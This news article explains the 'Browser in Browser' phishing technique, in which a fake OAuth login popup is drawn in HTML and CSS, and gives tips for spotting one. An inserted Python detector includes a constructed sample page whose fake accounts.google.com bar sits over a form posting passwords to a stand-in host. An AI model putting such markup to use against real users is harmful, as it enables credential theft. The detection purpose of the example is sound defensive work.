This method is so clever that even the smartest Internet users can be fooled by it. (Photo: various websites)
Silicon Valley: The latest video from Infinite Logins, a YouTube channel on cyber security, reports that hackers have discovered a new “phishing” method called “Browser in Browser” (BitB) to steal the usernames and passwords of Internet users.
The video, aimed at cyber security experts, details the BitB method with reference to a white-hat hacker known as “Mr. Dox” (mr.d0x).
According to reports published by Infinite Logins, Mr. Dox and Ars Technica, this new method is so clever that even a smart and intelligent Internet user can be deceived by it.
BitB is based on the “third-party logins” used by millions of websites around the world today.
With a third-party login, you do not need to create a separate account to log in to a website; instead, you log in to that website by verifying your existing account on Google, Facebook or Apple.
For this purpose “OAuth” is used: an open protocol that provides automatic, fast and secure verification of Google, Facebook, Apple and similar accounts to log in to any website.
In the BitB method, a popup for third-party logins is created using Hypertext Markup Language (HTML) and Cascading Style Sheets (CSS), and it looks just like a real authentication (authorization) window.
Not only that, the URL in the address bar of this window also looks very real, such as accounts.google.com.
Even an informed Internet user is deceived by this and enters their username and password into the third-party login window; thus, they inadvertently hand their most important information to an unknown hacker.
In a related post, Ars Technica Security Editor Dan Goodin offers some tips for identifying and avoiding BitB phishing.
He writes that the BitB phishing login window is not a separate window but a “browser within a browser” window that only looks like a separate, original login window.
Is this login window real or fake? If it’s moving left or right, it’s a fake login window because it was apparently formatted with the help of CSS.
Dan Goodin’s second method for identifying BitB phishing is a bit trickier.
For this, you need to right-click on the login window and select Inspect, then take a closer look at the markup in the inspector panel that appears: it will contain the address of the unknown website where the entered username and password are saved.
This way you will discover for yourself the truth of this fake login window.
Additionally, if desired, you can enter a wrong username and password in this login window as a test. A real login window will reject the wrong username and password, but the fake login window will accept them as ‘correct’.
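The inspection check described above can also be run over saved page markup. The following Python code is an added example, not code from Ars Technica, Infinite Logins or mr.d0x; the sample HTML, the host collector.example and the name inspect_login_markup are constructed for illustration, and it assumes the drawn address bar shows a full http(s) URL as text.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_TEXT = re.compile(r"https?://[A-Za-z0-9.-]+[^\s<]*")

class LoginMarkupInspector(HTMLParser):
    """Collects hosts drawn as page text and hosts that would receive a password."""
    def __init__(self):
        super().__init__()
        self.displayed = set()     # URLs rendered as text, e.g. a drawn address bar
        self.destinations = set()  # password form actions and iframe sources
        self._action = None        # action of the <form> currently open, if any
        self._hidden = 0           # nesting depth inside <script>/<style>

    def _dest(self, url):
        self.destinations.add(urlparse(url).hostname or "(same page)")

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "style"):
            self._hidden += 1
        elif tag == "form":
            self._action = a.get("action") or ""
        elif tag == "iframe":
            self._dest(a.get("src") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self._dest(self._action or "")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._hidden = max(0, self._hidden - 1)
        elif tag == "form":
            self._action = None

    def handle_data(self, data):
        if not self._hidden:  # script and style text is never shown to the user
            for m in URL_TEXT.finditer(data):
                self.displayed.add(urlparse(m.group()).hostname)

def inspect_login_markup(html):
    """Flag markup that shows one host as text but sends the password to another."""
    p = LoginMarkupInspector()
    p.feed(html)
    mismatched = p.displayed - p.destinations
    return {"displayed": sorted(p.displayed), "destinations": sorted(p.destinations),
            "suspicious": bool(mismatched and p.destinations)}

# Constructed sample: a drawn "address bar" whose form posts to a different host.
SAMPLE = """<div class="address-bar">https://accounts.google.com/o/oauth2/auth</div>
<form action="https://collector.example/submit" method="post">
<input type="email" name="user"><input type="password" name="pass"></form>"""
```

A genuine third-party login opens in a separate browser window, so the provider's URL never appears as text inside the page that holds the password field; that is why a displayed host that differs from the submission host is treated as the signal here.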
Cyber security experts say that so far most phishing attacks have been easy to spot, but the BitB method is so complex that users need to be aware of alternative authentication methods to avoid it, and most consumers do not do this for the sake of convenience.
According to Mr. Dox, the new phishing method appeared a few weeks ago, but it is likely that hackers have been using it since 2020.